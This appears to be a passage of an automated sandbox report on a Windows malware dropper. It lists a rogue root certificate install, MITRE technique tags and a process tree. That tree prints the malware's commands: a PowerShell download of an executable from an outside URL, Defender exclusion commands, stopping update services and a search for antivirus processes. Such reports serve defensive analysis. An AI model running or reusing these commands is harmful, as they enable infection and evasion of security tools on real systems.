Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	gagagggagagag.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	ubi-inst.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 190000000100000010000000dbd91ea86008fd8536f2b37529666c7b140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	gagagggagagag.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Buyer.pif
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3848	schtasks.exe
3544	schtasks.exe
5868	schtasks.exe
1632	schtasks.exe
7812	schtasks.exe
3160	schtasks.exe
3716	schtasks.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
2792	Buyer.pif
2792	Buyer.pif
2792	Buyer.pif
2792	Buyer.pif
1732	chrome.exe
1732	chrome.exe
1344	powershell.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe
1804	gagagggagagag.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3056	4363463463464363463463463.exe
Token: SeDebugPrivilege	2148	tasklist.exe
Token: SeDebugPrivilege	1628	tasklist.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeDebugPrivilege	1344	powershell.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe
Token: SeShutdownPrivilege	1732	chrome.exe

Suspicious use of FindShellTrayWindow 42 IoCs

pid	Process
2792	Buyer.pif
2792	Buyer.pif
2792	Buyer.pif
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
2344	cmaclient.exe
2344	cmaclient.exe
2344	cmaclient.exe
2344	cmaclient.exe
2344	cmaclient.exe

Suspicious use of SendNotifyMessage 40 IoCs

pid	Process
2792	Buyer.pif
2792	Buyer.pif
2792	Buyer.pif
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
2344	cmaclient.exe
2344	cmaclient.exe
2344	cmaclient.exe
2344	cmaclient.exe
2344	cmaclient.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1804	gagagggagagag.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3056 wrote to memory of 2608	3056	4363463463464363463463463.exe	31
PID 3056 wrote to memory of 2608	3056	4363463463464363463463463.exe	31
PID 3056 wrote to memory of 2608	3056	4363463463464363463463463.exe	31
PID 3056 wrote to memory of 2608	3056	4363463463464363463463463.exe	31
PID 2608 wrote to memory of 480	2608	PharmaciesDetection.exe	32
PID 2608 wrote to memory of 480	2608	PharmaciesDetection.exe	32
PID 2608 wrote to memory of 480	2608	PharmaciesDetection.exe	32
PID 2608 wrote to memory of 480	2608	PharmaciesDetection.exe	32
PID 480 wrote to memory of 2148	480	cmd.exe	34
PID 480 wrote to memory of 2148	480	cmd.exe	34
PID 480 wrote to memory of 2148	480	cmd.exe	34
PID 480 wrote to memory of 2148	480	cmd.exe	34
PID 480 wrote to memory of 1796	480	cmd.exe	35
PID 480 wrote to memory of 1796	480	cmd.exe	35
PID 480 wrote to memory of 1796	480	cmd.exe	35
PID 480 wrote to memory of 1796	480	cmd.exe	35
PID 480 wrote to memory of 1628	480	cmd.exe	37
PID 480 wrote to memory of 1628	480	cmd.exe	37
PID 480 wrote to memory of 1628	480	cmd.exe	37
PID 480 wrote to memory of 1628	480	cmd.exe	37
PID 480 wrote to memory of 1636	480	cmd.exe	38
PID 480 wrote to memory of 1636	480	cmd.exe	38
PID 480 wrote to memory of 1636	480	cmd.exe	38
PID 480 wrote to memory of 1636	480	cmd.exe	38
PID 480 wrote to memory of 1976	480	cmd.exe	39
PID 480 wrote to memory of 1976	480	cmd.exe	39
PID 480 wrote to memory of 1976	480	cmd.exe	39
PID 480 wrote to memory of 1976	480	cmd.exe	39
PID 480 wrote to memory of 1856	480	cmd.exe	40
PID 480 wrote to memory of 1856	480	cmd.exe	40
PID 480 wrote to memory of 1856	480	cmd.exe	40
PID 480 wrote to memory of 1856	480	cmd.exe	40
PID 480 wrote to memory of 2384	480	cmd.exe	41
PID 480 wrote to memory of 2384	480	cmd.exe	41
PID 480 wrote to memory of 2384	480	cmd.exe	41
PID 480 wrote to memory of 2384	480	cmd.exe	41
PID 480 wrote to memory of 2792	480	cmd.exe	42
PID 480 wrote to memory of 2792	480	cmd.exe	42
PID 480 wrote to memory of 2792	480	cmd.exe	42
PID 480 wrote to memory of 2792	480	cmd.exe	42
PID 480 wrote to memory of 3064	480	cmd.exe	43
PID 480 wrote to memory of 3064	480	cmd.exe	43
PID 480 wrote to memory of 3064	480	cmd.exe	43
PID 480 wrote to memory of 3064	480	cmd.exe	43
PID 1732 wrote to memory of 848	1732	chrome.exe	49
PID 1732 wrote to memory of 848	1732	chrome.exe	49
PID 1732 wrote to memory of 848	1732	chrome.exe	49
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50
PID 1732 wrote to memory of 1932	1732	chrome.exe	50

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5988	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3056
- C:\Users\Admin\AppData\Local\Temp\Files\PharmaciesDetection.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\PharmaciesDetection.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:480
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2148
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1796
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1628
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe ekrn.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1636
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 447331
      4⤵
      System Location Discovery: System Language Discovery
      PID:1976
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "typesfaxincreasecompound" Ensemble
      4⤵
      System Location Discovery: System Language Discovery
      PID:1856
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Compile + Olive + Within + Psychiatry 447331\p
      4⤵
      System Location Discovery: System Language Discovery
      PID:2384
  - - C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif
      Buyer.pif p
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies system certificate store
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2792
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif" & rd /s /q "C:\ProgramData\HJDAKFBFBFBA" & exit
        5⤵
        
        PID:816
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        Delays execution with timeout.exe
        
        PID:2876
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      System Location Discovery: System Language Discovery
      PID:3064
- C:\Users\Admin\AppData\Local\Temp\Files\npp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2064
- - C:\Users\Admin\AppData\Local\Temp\1578414444.exe
    C:\Users\Admin\AppData\Local\Temp\1578414444.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2976
  - - C:\Windows\sysnldcvmr.exe
      C:\Windows\sysnldcvmr.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1004
    - - C:\Users\Admin\AppData\Local\Temp\3308631091.exe
        
        C:\Users\Admin\AppData\Local\Temp\3308631091.exe
        5⤵
        
        PID:1548
      - C:\Users\Admin\AppData\Local\Temp\1459532539.exe
        
        C:\Users\Admin\AppData\Local\Temp\1459532539.exe
        6⤵
        
        PID:4200
        
        C:\ProgramData\EDD8.tmp
        
        "C:\ProgramData\EDD8.tmp"
        7⤵
        
        PID:6420
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\EDD8.tmp >> NUL
        8⤵
        
        PID:9956
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 504
        6⤵
        Program crash
        
        PID:5160
    - - C:\Users\Admin\AppData\Local\Temp\860221502.exe
        
        C:\Users\Admin\AppData\Local\Temp\860221502.exe
        5⤵
        
        PID:2964
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:636
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:488
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:2172
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:2904
    - - C:\Users\Admin\AppData\Local\Temp\2502111965.exe
        
        C:\Users\Admin\AppData\Local\Temp\2502111965.exe
        5⤵
        
        PID:2184
    - - C:\Users\Admin\AppData\Local\Temp\116422987.exe
        
        C:\Users\Admin\AppData\Local\Temp\116422987.exe
        5⤵
        
        PID:2600
      - C:\Users\Admin\AppData\Local\Temp\2436627678.exe
        
        C:\Users\Admin\AppData\Local\Temp\2436627678.exe
        6⤵
        
        PID:3180
- C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\gagagggagagag.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1804
- C:\Users\Admin\AppData\Local\Temp\Files\cmaclient.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cmaclient.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2344
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:excellent2024/:stars_1/stars" -OutFile "C:\Users\Public\Guard.exe""
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1344
- C:\Users\Admin\AppData\Local\Temp\Files\xyaw4fkp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\xyaw4fkp.exe"
  2⤵
  - Executes dropped EXE
  PID:820
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:3664
- C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1936
- - C:\Users\Admin\AppData\Local\Temp\is-PMBPM.tmp\ubi-inst.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-PMBPM.tmp\ubi-inst.tmp" /SL5="$A0170,922170,832512,C:\Users\Admin\AppData\Local\Temp\Files\ubi-inst.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    PID:908
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-KBMF2.tmp\set.bat""
      4⤵
      System Location Discovery: System Language Discovery
      PID:2864
- C:\Users\Admin\AppData\Local\Temp\Files\surfex.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\surfex.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:2644
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    PID:1088
- C:\Users\Admin\AppData\Local\Temp\Files\ovrflw.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ovrflw.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1988
- - C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
    3⤵
    - Executes dropped EXE
    PID:3024
- C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\peinf.exe"
  2⤵
  - Executes dropped EXE
  PID:872
- C:\Users\Admin\AppData\Local\Temp\Files\t2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\t2.exe"
  2⤵
  PID:2440
- - C:\Windows\sysklnorbcv.exe
    C:\Windows\sysklnorbcv.exe
    3⤵
    PID:2804
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
      4⤵
      PID:1536
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1508
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
      4⤵
      PID:2928
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:2576
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:2556
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:1604
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        5⤵
        Launches sc.exe
        
        PID:2872
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        5⤵
        Launches sc.exe
        
        PID:2344
  - - C:\Users\Admin\AppData\Local\Temp\2207633717.exe
      C:\Users\Admin\AppData\Local\Temp\2207633717.exe
      4⤵
      PID:1948
  - - C:\Users\Admin\AppData\Local\Temp\2011527391.exe
      C:\Users\Admin\AppData\Local\Temp\2011527391.exe
      4⤵
      PID:3220
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        5⤵
        
